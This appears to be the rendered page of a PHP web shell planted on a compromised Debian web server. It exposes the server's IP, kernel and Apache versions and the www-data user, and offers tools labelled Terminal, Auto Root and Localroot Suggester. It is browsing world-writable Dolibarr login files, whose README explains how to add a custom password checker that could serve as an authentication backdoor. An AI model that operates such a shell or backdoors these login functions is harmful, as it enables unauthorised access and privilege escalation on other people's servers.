Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
speed.bdcloud.fr /
core /
login /
Delete
Unzip
Name
Size
Permission
Date
Action
README.txt
889
B
-rwxrwxrwx
2020-09-02 15:32
functions_dolibarr.php
5.49
KB
-rwxrwxrwx
2020-09-02 15:32
functions_empty.php
1.47
KB
-rwxrwxrwx
2020-09-02 15:32
functions_forceuser.php
1.66
KB
-rwxrwxrwx
2020-09-02 15:32
functions_googleoauth.php
2.72
KB
-rwxrwxrwx
2020-09-02 15:32
functions_http.php
1.51
KB
-rwxrwxrwx
2020-09-02 15:32
functions_ldap.php
10.27
KB
-rwxrwxrwx
2020-09-02 15:32
functions_openid.php
3.99
KB
-rwxrwxrwx
2020-09-02 15:32
index.html
0
B
-rwxrwxrwx
2020-09-02 15:32
Save
Rename
README (english) --------------------------------------------- Decription of htdocs/core/login directory --------------------------------------------- This directory contains files that handle way to validate passwords. If you want to add a new password checker function, just add a file in this directory that follow example of already existing files. This file must be called for example : functions_mypasschecker.php Edit function name to call it: check_user_mypasschecker Change code of this function to return true if couple $usertotest / $passwordtotest is ok for you. Then, you must edit you conf.php file to change the value of $dolibarr_main_authentication parameter to set it to : mypasschecker Once this is done, when you log in to Dolibarr, the function check_user_mypasschecker in this file is called. If the function return true and login exists, login is accepted.